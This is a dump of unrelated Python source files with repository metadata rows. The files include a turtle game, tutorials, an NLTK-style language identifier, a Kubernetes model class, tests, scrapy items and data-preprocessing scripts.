wn.bgcolor("lightgreen")#my game change thing
global timer, timer_up
counter.penup()
counter.goto(350,225)
counter.ht()
counter.clear()
if timer <= 0:
counter.goto(0,80)
counter.write("Time's Up", font=font_setup)
timer_up = True
game_over()
manage_leaderboard()
else:
counter.write("Timer: " + str(timer), font=font_setup)
timer -= 1
counter.getscreen().ontimer(countdown, counter_interval)
def game_over():
wn.bgcolor("lightblue")
Amy.ht()
Amy.goto(500,500)
# manages the leaderboard for top 5 scorers
def manage_leaderboard():
global leader_scores_list
global leader_names_list
global score
global Amy
# load all the leaderboard records into the lists
lb.load_leaderboard(leaderboard_file_name, leader_names_list, leader_scores_list)
# TODO
if (len(leader_scores_list) < 5 or score > leader_scores_list[4]):
lb.update_leaderboard(leaderboard_file_name, leader_names_list, leader_scores_list, player_name, score)
lb.draw_leaderboard(leader_names_list, leader_scores_list, True, Amy, score)
else:
lb.draw_leaderboard(leader_names_list, leader_scores_list, False, Amy, score)
#-----events----------------
Amy.onclick(turtle_clicked)
wn = trtl.Screen()
wn.ontimer(countdown, counter_interval)
wn.mainloop() | [
"noreply@github.com"
] | riley-csp-2019-20.noreply@github.com |
fffaea4b5fab14b8a13db2f9f03a3f89301b5981 | 6f2d5600b65b062151bab88c592796b878de7465 | /Week_3/Class_0226/Function_2_tuple.py | 7e1d6989619b585a1d0dc0ad18f1c32533c6f469 | [] | no_license | zhouyanmeng/python_api_test | 1e6549321c20ee9a71beffac2533c917b5ecc157 | 7303352c9b5baacba5296b088f89ba4c702fb485 | refs/heads/master | 2022-12-17T14:34:26.351566 | 2019-03-01T13:02:06 | 2019-03-01T13:02:06 | 185,185,856 | 0 | 0 | null | 2022-12-08T01:45:15 | 2019-05-06T11:45:55 | Python | UTF-8 | Python | false | false | 420 | py | #####元组的内置函数 不可变元素,所有方法特别少
t=('rigth','sadness','灰灰的','柠檬','sadness','sadness')
####count统计数量的作用
res=t.count('A')###寻找元素出现的次数,在元组里面去找
print(res)
####index 找某个元素索引(位置) 找不到报错 默认1开始,可以指定个数
res=t.index("rigth")
print(res)###0
res=t.index("sadness",3)
print(res)###4
| [
"2440269710@qq.com"
] | 2440269710@qq.com |
0dce4ec9766df4f4af8856792758ec7b7d60a045 | adcbefa6cba639ec8c8eb74766b7f6cd5301d041 | /coffeehouse_nlpfr/classify/textcat.py | 32480de52dcff8dc955f48ed7948bedbc781b998 | [] | no_license | intellivoid/CoffeeHouse-NLPFR | b39ae1eaeb8936c5c5634f39e0a30d1feece6705 | 8ad1b988ddba086478c320f638d10d0c0cacca4c | refs/heads/master | 2022-11-28T02:13:40.670494 | 2020-06-07T04:02:00 | 2020-06-07T04:02:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,110 | py | # -*- coding: utf-8 -*-
# Natural Language Toolkit: Language ID module using TextCat algorithm
#
# Copyright (C) 2001-2019 NLTK Project
# Author: Avital Pekker <avital.pekker@utoronto.ca>
#
# URL: <http://nltk.org/>
# For license information, see LICENSE.TXT
"""
A module for language identification using the TextCat algorithm.
An implementation of the text categorization algorithm
presented in Cavnar, W. B. and J. M. Trenkle,
"N-Gram-Based Text Categorization".
The algorithm takes advantage of Zipf's law and uses
n-gram frequencies to profile languages and text-yet to
be identified-then compares using a distance measure.
Language n-grams are provided by the "An Crubadan"
project. A corpus reader was created separately to read
those files.
For details regarding the algorithm, see:
http://www.let.rug.nl/~vannoord/TextCat/textcat.pdf
For details about An Crubadan, see:
http://borel.slu.edu/crubadan/index.html
"""
from coffeehouse_nlpfr.compat import PY3
from coffeehouse_nlpfr.util import trigrams
if PY3:
from sys import maxsize
else:
from sys import maxint
# Note: this is NOT "re" you're likely used to. The regex module
# is an alternative to the standard re module that supports
# Unicode codepoint properties with the \p{} syntax.
# You may have to "pip install regx"
try:
import regex as re
except ImportError:
re = None
######################################################################
## Language identification using TextCat
######################################################################
class TextCat(object):
_corpus = None
fingerprints = {}
_START_CHAR = "<"
_END_CHAR = ">"
last_distances = {}
def __init__(self):
if not re:
raise EnvironmentError(
"classify.textcat requires the regex module that "
"supports unicode. Try '$ pip install regex' and "
"see https://pypi.python.org/pypi/regex for "
"further details."
)
from coffeehouse_nlpfr.corpus import crubadan
self._corpus = crubadan
# Load all language ngrams into cache
for lang in self._corpus.langs():
self._corpus.lang_freq(lang)
def remove_punctuation(self, text):
""" Get rid of punctuation except apostrophes """
return re.sub(r"[^\P{P}\']+", "", text)
def profile(self, text):
""" Create FreqDist of trigrams within text """
from coffeehouse_nlpfr import word_tokenize, FreqDist
clean_text = self.remove_punctuation(text)
tokens = word_tokenize(clean_text)
fingerprint = FreqDist()
for t in tokens:
token_trigram_tuples = trigrams(self._START_CHAR + t + self._END_CHAR)
token_trigrams = ["".join(tri) for tri in token_trigram_tuples]
for cur_trigram in token_trigrams:
if cur_trigram in fingerprint:
fingerprint[cur_trigram] += 1
else:
fingerprint[cur_trigram] = 1
return fingerprint
def calc_dist(self, lang, trigram, text_profile):
""" Calculate the "out-of-place" measure between the
text and language profile for a single trigram """
lang_fd = self._corpus.lang_freq(lang)
dist = 0
if trigram in lang_fd:
idx_lang_profile = list(lang_fd.keys()).index(trigram)
idx_text = list(text_profile.keys()).index(trigram)
# print(idx_lang_profile, ", ", idx_text)
dist = abs(idx_lang_profile - idx_text)
else:
# Arbitrary but should be larger than
# any possible trigram file length
# in terms of total lines
if PY3:
dist = maxsize
else:
dist = maxint
return dist
def lang_dists(self, text):
""" Calculate the "out-of-place" measure between
the text and all languages """
distances = {}
profile = self.profile(text)
# For all the languages
for lang in self._corpus._all_lang_freq.keys():
# Calculate distance metric for every trigram in
# input text to be identified
lang_dist = 0
for trigram in profile:
lang_dist += self.calc_dist(lang, trigram, profile)
distances[lang] = lang_dist
return distances
def guess_language(self, text):
""" Find the language with the min distance
to the text and return its ISO 639-3 code """
self.last_distances = self.lang_dists(text)
return min(self.last_distances, key=self.last_distances.get)
#################################################')
def demo():
from coffeehouse_nlpfr.corpus import udhr
langs = [
"Kurdish-UTF8",
"Abkhaz-UTF8",
"Farsi_Persian-UTF8",
"Hindi-UTF8",
"Hawaiian-UTF8",
"Russian-UTF8",
"Vietnamese-UTF8",
"Serbian_Srpski-UTF8",
"Esperanto-UTF8",
]
friendly = {
"kmr": "Northern Kurdish",
"abk": "Abkhazian",
"pes": "Iranian Persian",
"hin": "Hindi",
"haw": "Hawaiian",
"rus": "Russian",
"vie": "Vietnamese",
"srp": "Serbian",
"epo": "Esperanto",
}
tc = TextCat()
for cur_lang in langs:
# Get raw data from UDHR corpus
raw_sentences = udhr.sents(cur_lang)
rows = len(raw_sentences) - 1
cols = list(map(len, raw_sentences))
sample = ""
# Generate a sample text of the language
for i in range(0, rows):
cur_sent = ""
for j in range(0, cols[i]):
cur_sent += " " + raw_sentences[i][j]
sample += cur_sent
# Try to detect what it is
print("Language snippet: " + sample[0:140] + "...")
guess = tc.guess_language(sample)
print("Language detection: %s (%s)" % (guess, friendly[guess]))
print("#" * 140)
if __name__ == "__main__":
demo()
| [
"netkas@intellivoid.info"
] | netkas@intellivoid.info |
a60f708732cd173bb315e5f8aac3373e5d378180 | 31bc3fdc7c2b62880f84e50893c8e3d0dfb66fa6 | /language/python_27/built_in_functions/xrange_.py | 7bdc6a3472b618b41017ab38268da7e639255b1c | [] | no_license | tpt5cu/python-tutorial | 6e25cf0b346b8182ebc8a921efb25db65f16c144 | 5998e86165a52889faf14133b5b0d7588d637be1 | refs/heads/master | 2022-11-28T16:58:51.648259 | 2020-07-23T02:20:37 | 2020-07-23T02:20:37 | 269,521,394 | 0 | 0 | null | 2020-06-05T03:23:51 | 2020-06-05T03:23:50 | null | UTF-8 | Python | false | false | 713 | py | # https://docs.python.org/2/library/functions.html#xrange
def use_xrange():
'''
The xrange() function is totally different from the range() function. It does not return a list. I can think of it as a generator. It has the same
method signature as range()
'''
x = xrange(1, 10)
print(x) # xrange(1, 10)
print(type(x)) # <type 'xrange'>
def supported_operations():
'''
These are supported on xrange() objects:
- indexing
- len()
- "in"
No slicing!
'''
r = xrange(0, 10)
print(r[1]) # 1
print(len(r)) # 10
#print(r[0:9:2]) # [0, 2, 4, 6, 8]
print(5 in r) # True
if __name__ == '__main__':
#use_xrange()
supported_operations() | [
"uif93194@gmail.com"
] | uif93194@gmail.com |
d3205bd4ff23c60c90c8e9f539e38a4470e037fe | e77c683da89f4705b015e76f02486e7001d82697 | /kubernetes/client/models/v2_hpa_scaling_rules.py | c045f5d4dc20f9d483698b3f271d1b66d608fde0 | [
"Apache-2.0"
] | permissive | Sandello76/python-2 | 4027901d7a9a7d451146fafb844f242708784999 | e5f4520522681a8ec50052991d6226296dc0fb5e | refs/heads/master | 2023-01-21T11:17:31.697036 | 2022-04-12T11:43:35 | 2022-04-12T11:43:35 | 169,290,597 | 0 | 0 | Apache-2.0 | 2023-01-13T03:11:56 | 2019-02-05T18:29:08 | Python | UTF-8 | Python | false | false | 6,818 | py | # coding: utf-8
"""
Kubernetes
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: release-1.23
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from kubernetes.client.configuration import Configuration
class V2HPAScalingRules(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'policies': 'list[V2HPAScalingPolicy]',
'select_policy': 'str',
'stabilization_window_seconds': 'int'
}
attribute_map = {
'policies': 'policies',
'select_policy': 'selectPolicy',
'stabilization_window_seconds': 'stabilizationWindowSeconds'
}
def __init__(self, policies=None, select_policy=None, stabilization_window_seconds=None, local_vars_configuration=None): # noqa: E501
"""V2HPAScalingRules - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._policies = None
self._select_policy = None
self._stabilization_window_seconds = None
self.discriminator = None
if policies is not None:
self.policies = policies
if select_policy is not None:
self.select_policy = select_policy
if stabilization_window_seconds is not None:
self.stabilization_window_seconds = stabilization_window_seconds
@property
def policies(self):
"""Gets the policies of this V2HPAScalingRules. # noqa: E501
policies is a list of potential scaling polices which can be used during scaling. At least one policy must be specified, otherwise the HPAScalingRules will be discarded as invalid # noqa: E501
:return: The policies of this V2HPAScalingRules. # noqa: E501
:rtype: list[V2HPAScalingPolicy]
"""
return self._policies
@policies.setter
def policies(self, policies):
"""Sets the policies of this V2HPAScalingRules.
policies is a list of potential scaling polices which can be used during scaling. At least one policy must be specified, otherwise the HPAScalingRules will be discarded as invalid # noqa: E501
:param policies: The policies of this V2HPAScalingRules. # noqa: E501
:type: list[V2HPAScalingPolicy]
"""
self._policies = policies
@property
def select_policy(self):
"""Gets the select_policy of this V2HPAScalingRules. # noqa: E501
selectPolicy is used to specify which policy should be used. If not set, the default value Max is used. # noqa: E501
:return: The select_policy of this V2HPAScalingRules. # noqa: E501
:rtype: str
"""
return self._select_policy
@select_policy.setter
def select_policy(self, select_policy):
"""Sets the select_policy of this V2HPAScalingRules.
selectPolicy is used to specify which policy should be used. If not set, the default value Max is used. # noqa: E501
:param select_policy: The select_policy of this V2HPAScalingRules. # noqa: E501
:type: str
"""
self._select_policy = select_policy
@property
def stabilization_window_seconds(self):
"""Gets the stabilization_window_seconds of this V2HPAScalingRules. # noqa: E501
StabilizationWindowSeconds is the number of seconds for which past recommendations should be considered while scaling up or scaling down. StabilizationWindowSeconds must be greater than or equal to zero and less than or equal to 3600 (one hour). If not set, use the default values: - For scale up: 0 (i.e. no stabilization is done). - For scale down: 300 (i.e. the stabilization window is 300 seconds long). # noqa: E501
:return: The stabilization_window_seconds of this V2HPAScalingRules. # noqa: E501
:rtype: int
"""
return self._stabilization_window_seconds
@stabilization_window_seconds.setter
def stabilization_window_seconds(self, stabilization_window_seconds):
"""Sets the stabilization_window_seconds of this V2HPAScalingRules.
StabilizationWindowSeconds is the number of seconds for which past recommendations should be considered while scaling up or scaling down. StabilizationWindowSeconds must be greater than or equal to zero and less than or equal to 3600 (one hour). If not set, use the default values: - For scale up: 0 (i.e. no stabilization is done). - For scale down: 300 (i.e. the stabilization window is 300 seconds long). # noqa: E501
:param stabilization_window_seconds: The stabilization_window_seconds of this V2HPAScalingRules. # noqa: E501
:type: int
"""
self._stabilization_window_seconds = stabilization_window_seconds
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, V2HPAScalingRules):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, V2HPAScalingRules):
return True
return self.to_dict() != other.to_dict()
| [
"yliao@google.com"
] | yliao@google.com |
cc31a73155bf7a1396a114b82259e779537e8ff9 | 9c63f6d39a6085674ab42d1488476d0299f39ec9 | /Python/LC_Kth_Largest_Element_in_an_Array.py | 7c993647bd88be65ae4b55dc5b44039e08b71761 | [] | no_license | vijayjag-repo/LeetCode | 2237e3117e7e902f5ac5c02bfb5fbe45af7242d4 | 0a5f47e272f6ba31e3f0ff4d78bf6e3f4063c789 | refs/heads/master | 2022-11-14T17:46:10.847858 | 2022-11-08T10:28:30 | 2022-11-08T10:28:30 | 163,639,628 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 474 | py | class Solution(object):
def findKthLargest(self, nums, k):
"""
:type nums: List[int]
:type k: int
:rtype: int
"""
# Solution 1
# There are different variations which you can do with heap. This is one of the smallest along with heapq.nlargest()
heapq.heapify(nums)
for i in range(len(nums)-k+1):
val = heapq.heappop(nums)
return(val)
| [
"noreply@github.com"
] | vijayjag-repo.noreply@github.com |
a277e9f184cbf53ef869869269365cfe9e69fd90 | fa51b088ea761b78cf0c85837fabaa0b7035b105 | /automl/snippets/language_sentiment_analysis_create_model.py | 40262aa4f637ba15df8f0e51fd488a2a48593cab | [
"Apache-2.0"
] | permissive | manavgarg/python-docs-samples | f27307022092bc35358b8ddbd0f73d56787934d1 | 54b9cd6740b4dbc64db4d43a16de13c702b2364b | refs/heads/master | 2023-02-07T21:18:15.997414 | 2023-01-28T18:44:11 | 2023-01-28T18:44:11 | 245,290,674 | 0 | 0 | Apache-2.0 | 2020-03-05T23:44:17 | 2020-03-05T23:44:16 | null | UTF-8 | Python | false | false | 1,697 | py | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
def create_model(project_id, dataset_id, display_name):
"""Create a model."""
# [START automl_language_sentiment_analysis_create_model]
from google.cloud import automl
# TODO(developer): Uncomment and set the following variables
# project_id = "YOUR_PROJECT_ID"
# dataset_id = "YOUR_DATASET_ID"
# display_name = "YOUR_MODEL_NAME"
client = automl.AutoMlClient()
# A resource that represents Google Cloud Platform location.
project_location = f"projects/{project_id}/locations/us-central1"
# Leave model unset to use the default base model provided by Google
metadata = automl.TextSentimentModelMetadata()
model = automl.Model(
display_name=display_name,
dataset_id=dataset_id,
text_sentiment_model_metadata=metadata,
)
# Create a model with the model metadata in the region.
response = client.create_model(parent=project_location, model=model)
print("Training operation name: {}".format(response.operation.name))
print("Training started...")
# [END automl_language_sentiment_analysis_create_model]
return response
| [
"71398022+dandhlee@users.noreply.github.com"
] | 71398022+dandhlee@users.noreply.github.com |
15abe88a6ca070e5627b56fbc2a2561be4740ffb | 1bfb4df83565da98e0b7a2d25915370732b94b6a | /atcoder/abc188/e.py | 99f51f748eedd29f80e5a5a8462729e68334a149 | [
"MIT"
] | permissive | sugitanishi/competitive-programming | e8067090fc5a2a519ef091496d78d3154be98a2b | 51af65fdce514ece12f8afbf142b809d63eefb5d | refs/heads/main | 2023-08-11T02:48:38.404901 | 2021-10-14T14:57:21 | 2021-10-14T14:57:21 | 324,516,654 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 516 | py | import sys
sys.setrecursionlimit(10000000)
input=lambda : sys.stdin.readline().rstrip()
n,m=map(int,input().split())
a=list(map(int,input().split()))
dic=[ [[],-999999999999] for i in range(n)]
for i in range(m):
x,y=map(int,input().split())
x-=1
y-=1
dic[x][0].append(y)
ans = -999999999999
for i in range(n):
i = n-i-1
for v in dic[i][0]:
dic[i][1]=max(dic[i][1],dic[v][1])
if len(dic[i][0]):
ans=max(ans,dic[i][1]-a[i])
dic[i][1]=max(dic[i][1],a[i])
print(ans)
| [
"keita.abi.114@gmail.com"
] | keita.abi.114@gmail.com |
30b3686a98f972e2165cd478547a8747479f63d1 | 8100f7895b257d15f19ca41f3ace9849647e49f8 | /kademlia/tests/test_routing.py | ecaf1ae63b4f57035578d0f86aa3bba57fb66c94 | [
"MIT"
] | permissive | bmcorser/kademlia | 90cac70a2853a759cf55d0651fbb125c50a5f5f5 | c6f1062082d7e3cb8b5af53bcc672b138848b337 | refs/heads/master | 2021-01-17T04:51:37.439919 | 2014-12-26T19:57:43 | 2014-12-26T19:57:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,856 | py | from twisted.trial import unittest
from kademlia.routing import KBucket, RoutingTable
from kademlia.protocol import KademliaProtocol
from kademlia.tests.utils import mknode, FakeProtocol
class KBucketTest(unittest.TestCase):
def test_split(self):
bucket = KBucket(0, 10, 5)
bucket.addNode(mknode(intid=5))
bucket.addNode(mknode(intid=6))
one, two = bucket.split()
self.assertEqual(len(one), 1)
self.assertEqual(one.range, (0, 5))
self.assertEqual(len(two), 1)
self.assertEqual(two.range, (6, 10))
def test_addNode(self):
# when full, return false
bucket = KBucket(0, 10, 2)
self.assertTrue(bucket.addNode(mknode()))
self.assertTrue(bucket.addNode(mknode()))
self.assertFalse(bucket.addNode(mknode()))
self.assertEqual(len(bucket), 2)
# make sure when a node is double added it's put at the end
bucket = KBucket(0, 10, 3)
nodes = [mknode(), mknode(), mknode()]
for node in nodes:
bucket.addNode(node)
for index, node in enumerate(bucket.getNodes()):
self.assertEqual(node, nodes[index])
def test_inRange(self):
bucket = KBucket(0, 10, 10)
self.assertTrue(bucket.hasInRange(mknode(intid=5)))
self.assertFalse(bucket.hasInRange(mknode(intid=11)))
self.assertTrue(bucket.hasInRange(mknode(intid=10)))
self.assertTrue(bucket.hasInRange(mknode(intid=0)))
class RoutingTableTest(unittest.TestCase):
def setUp(self):
self.id = mknode().id
self.protocol = FakeProtocol(self.id)
self.router = self.protocol.router
def test_addContact(self):
self.router.addContact(mknode())
self.assertTrue(len(self.router.buckets), 1)
self.assertTrue(len(self.router.buckets[0].nodes), 1)
| [
"bamuller@gmail.com"
] | bamuller@gmail.com |
3925169a07bd92641cd6ea6064b96ecd6c232bde | d93c91e904470b46e04a4eadb8c459f9c245bb5a | /banglore_scrape/acresrent/acresrent/items.py | a1fc474292c3702617c42d5875f953929b5aaf90 | [] | no_license | nbourses/scrappers | 3de3cd8a5408349b0ac683846b9b7276156fb08a | cde168a914f83cd491dffe85ea24aa48f5840a08 | refs/heads/master | 2021-03-30T15:38:29.096213 | 2020-03-25T03:23:56 | 2020-03-25T03:23:56 | 63,677,541 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,429 | py | # -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# http://doc.scrapy.org/en/latest/topics/items.html
import scrapy
class AcresrentItem(scrapy.Item):
# define the fields for your item here like:
# name = scrapy.Field()
carpet_area = scrapy.Field()
updated_date = scrapy.Field()
management_by_landlord = scrapy.Field()
areacode = scrapy.Field()
mobile_lister = scrapy.Field()
google_place_id = scrapy.Field()
Launch_date = scrapy.Field()
Possession = scrapy.Field()
age = scrapy.Field()
address = scrapy.Field()
price_on_req = scrapy.Field()
sublocality = scrapy.Field()
config_type = scrapy.Field()
platform = scrapy.Field()
city = scrapy.Field()
listing_date = scrapy.Field()
txn_type = scrapy.Field()
property_type = scrapy.Field()
Building_name = scrapy.Field()
lat = scrapy.Field()
longt = scrapy.Field()
locality = scrapy.Field()
price_per_sqft = scrapy.Field()
Bua_sqft = scrapy.Field()
Status = scrapy.Field()
listing_by=scrapy.Field()
name_lister=scrapy.Field()
Selling_price = scrapy.Field()
Monthly_Rent = scrapy.Field()
Details = scrapy.Field()
data_id=scrapy.Field()
quality1 = scrapy.Field()
quality2 = scrapy.Field()
quality3 = scrapy.Field()
quality4 = scrapy.Field()
scraped_time = scrapy.Field()
pass
| [
"karanchudasama1@gmail.com"
] | karanchudasama1@gmail.com |
3a1be8b5f004ecaa5b1073b7bea1ccae15e324b7 | 40c4b8e9ac9074869bfb0dc1d3c3f566371f1764 | /Hangman1/rectangle3.py | 7082113cadbd1e910a7297d1e81a0b0631f390f4 | [] | no_license | katuhito/Hangman001 | 870a8827e69cbd9a8b01ffb55f5c499c71861b76 | 710a201c6ad8284e164ea8ad26cd061486c50849 | refs/heads/master | 2022-12-06T16:30:24.613288 | 2020-08-22T10:19:27 | 2020-08-22T10:19:27 | 285,448,433 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 241 | py | class Rectangle:
def __init__(self, w, l):
self.width = w
self.len = l
def print_size(self):
print("{} by {}".format(self.width, self.len))
my_rectangle = Rectangle(10, 24)
my_rectangle.print_size()
| [
"katuhitohara@gmail.com"
] | katuhitohara@gmail.com |
a2b1d622e04da9f379ad7dec5d7160a7df4cb382 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_200/5220.py | 3953bab56b760965dae521faab27b88c6280402e | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 287 | py | f = open("test.txt")
o = open("final.txt", 'w')
t = int(f.readline())
for i in range(t):
n = int(f.readline())
while n>0:
if int(''.join(sorted(list(str(n))))) == n:
o.write("Case #{}: {}\n".format(i+1,n))
break
else:
n -= 1
| [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
bbf1b8bfc58b8fa0bb3231f35c168ee5235006e9 | 0fea8a6421fe5f5967f2202910022c2bfd277b4d | /190.生成字典.py | 51461ae593ab4ecd836413dd315ba3b0b9c3f9a8 | [] | no_license | maohaoyang369/Python_exercise | 4dc10ec061aa0de2bcfe59c86be115e135fb3fab | 8fbee8854db76d09e2b1f9365ff55198ddabd595 | refs/heads/master | 2020-04-09T23:04:02.327118 | 2019-09-05T14:49:07 | 2019-09-05T14:49:07 | 160,646,057 | 0 | 2 | null | 2019-03-21T14:44:13 | 2018-12-06T08:50:19 | Python | UTF-8 | Python | false | false | 498 | py | # !/usr/bin/env python
# -*- coding: utf-8 -*-
# 生成字典{“a”:1,”c”:3,”e”:5,”g”:7,”i”:9}
import string
letters = string.ascii_letters[0:9]
result = {}
for i in range(0, len(letters), 2):
result[letters[i]] = i+1
print(result)
# 将以上字典的key和value拼接成字符串,不能使用字符串连接符(+)
sentence = {'a': 1, 'c': 3, 'e': 5, 'g': 7, 'i': 9}
result = ""
for m, n in sentence.items():
result += m
result += str(n)
print(result)
| [
"372713573@qq.com"
] | 372713573@qq.com |
9848f1253781378294034070b41e90cb3b18980e | 524b2ef7ace38954af92a8ed33e27696f4f69ece | /montecarlo4fms/utils/mctsstats_its.py | 9a7cf4b70cb928340f7e17db07c8bbccd33a7734 | [] | no_license | jmhorcas/montecarlo_analysis | ebf9357b0ede63aa9bcdadb6a5a30a50ad7460eb | 2319838afb0f738125afc081fc4b58a0d8e2faee | refs/heads/main | 2023-06-24T19:05:36.485241 | 2021-07-20T08:24:06 | 2021-07-20T08:24:06 | 363,059,338 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,978 | py | from montecarlo4fms.models import State
class MCTSStatsIts():
"""Iterations stats"""
ROUND_DECIMALS = 2
METHOD_STR = 'Method'
ITERATIONS_STR = 'Iterations'
STEPS_STR = 'Decisions'
SIMULATIONS_STR = 'Simulations'
EVALUATIONS_STR = 'Evaluations'
POSITIVE_EVALUATIONS_STR = 'PositiveEvaluations'
PERCENTAGE_POSITIVE_EVALUATIONS_STR = 'Percentage'
TREESIZE_STR = 'TreeSize'
TIME_STR = 'Time'
HEADER = [METHOD_STR, ITERATIONS_STR, STEPS_STR, SIMULATIONS_STR, EVALUATIONS_STR, POSITIVE_EVALUATIONS_STR, PERCENTAGE_POSITIVE_EVALUATIONS_STR, TREESIZE_STR, TIME_STR]
def __init__(self):
self.stats = {}
def add_step(self, method: str, steps: int, mcts_tree_search: dict, simulations: int, evaluations: int, positive_evaluations: int, time: float):
self.stats[simulations] = {}
self.stats[simulations][MCTSStatsIts.METHOD_STR] = f'"{method}"'
self.stats[simulations][MCTSStatsIts.STEPS_STR] = steps
self.stats[simulations][MCTSStatsIts.ITERATIONS_STR] = simulations
self.stats[simulations][MCTSStatsIts.SIMULATIONS_STR] = simulations
self.stats[simulations][MCTSStatsIts.EVALUATIONS_STR] = evaluations
self.stats[simulations][MCTSStatsIts.POSITIVE_EVALUATIONS_STR] = positive_evaluations
self.stats[simulations][MCTSStatsIts.PERCENTAGE_POSITIVE_EVALUATIONS_STR] = float(positive_evaluations) / float(evaluations)
self.stats[simulations][MCTSStatsIts.TREESIZE_STR] = 0 if mcts_tree_search is None else len(mcts_tree_search)
self.stats[simulations][MCTSStatsIts.TIME_STR] = time
def serialize(self, filepath: str):
with open(filepath, 'w+') as file:
header = ", ".join(MCTSStatsIts.HEADER)
file.write(f"{header}\n")
for its in sorted(self.stats.keys()):
line = ", ".join(str(self.stats[its][h]) for h in MCTSStatsIts.HEADER)
file.write(f"{line}\n")
| [
"jhorcas@us.es"
] | jhorcas@us.es |
7e2aca3f77a73d466a4da4a18a7e0bc5683a0fe4 | 3c30d27bf5856dcdbc689dd01ed12ae007fc5b07 | /dorandoran/config/settings/__init__.py | 02f06ea5d084ca462743c9fabf93e6fe6b7766ef | [] | no_license | Doran-Doran-development/DoranDoran-Server-2 | 047ff79a6cc472364b2bf6507d89617832e1571c | 6340af1b887e08270bee0e13029ee41df7dfeb1e | refs/heads/master | 2023-06-06T14:44:27.891110 | 2021-05-19T15:05:14 | 2021-05-19T15:05:14 | 346,971,795 | 11 | 0 | null | 2021-06-11T01:00:18 | 2021-03-12T06:58:34 | Python | UTF-8 | Python | false | false | 160 | py | import os
SETTINGS_MODULE = os.environ.get("DJANGO_SETTINGS_MODULE")
if not SETTINGS_MODULE or SETTINGS_MODULE == "config.settings":
from .local import *
| [
"hanbin8269@gmail.com"
] | hanbin8269@gmail.com |
3dbbc772a56fbcb69c3df9317f21fe380939b860 | facb8b9155a569b09ba66aefc22564a5bf9cd319 | /wp2/merra_scripts/02_preprocessing/merraLagScripts/392-tideGauge.py | bf4ff8cf2ba0191d209994b7caa2338c79b66107 | [] | no_license | moinabyssinia/modeling-global-storm-surges | 13e69faa8f45a1244a964c5de4e2a5a6c95b2128 | 6e385b2a5f0867df8ceabd155e17ba876779c1bd | refs/heads/master | 2023-06-09T00:40:39.319465 | 2021-06-25T21:00:44 | 2021-06-25T21:00:44 | 229,080,191 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,772 | py | # -*- coding: utf-8 -*-
"""
Created on Tue Mar 31 17:12:23 2020
****************************************************
Load predictors & predictands + predictor importance
****************************************************
@author: Michael Tadesse
"""
#import packages
import os
import pandas as pd
import datetime as dt #used for timedelta
from datetime import datetime
#define directories
# dir_name = 'F:\\01_erainterim\\03_eraint_lagged_predictors\\eraint_D3'
dir_in = "/lustre/fs0/home/mtadesse/merraAllCombined"
dir_out = "/lustre/fs0/home/mtadesse/merraAllLagged"
def lag():
os.chdir(dir_in)
#get names
tg_list_name = sorted(os.listdir())
x = 392
y = 393
for tg in range(x, y):
os.chdir(dir_in)
tg_name = tg_list_name[tg]
print(tg_name, '\n')
pred = pd.read_csv(tg_name)
#create a daily time series - date_range
#get only the ymd of the start and end times
start_time = pred['date'][0].split(' ')[0]
end_time = pred['date'].iloc[-1].split(' ')[0]
print(start_time, ' - ', end_time, '\n')
date_range = pd.date_range(start_time, end_time, freq = 'D')
#defining time changing lambda functions
time_str = lambda x: str(x)
time_converted_str = pd.DataFrame(map(time_str, date_range), columns = ['date'])
time_converted_stamp = pd.DataFrame(date_range, columns = ['timestamp'])
"""
first prepare the six time lagging dataframes
then use the merge function to merge the original
predictor with the lagging dataframes
"""
#prepare lagged time series for time only
#note here that since MERRA has 3hrly data
#the lag_hrs is increased from 6(eraint) to 31(MERRA)
time_lagged = pd.DataFrame()
lag_hrs = list(range(0, 31))
for lag in lag_hrs:
lag_name = 'lag'+str(lag)
lam_delta = lambda x: str(x - dt.timedelta(hours = lag))
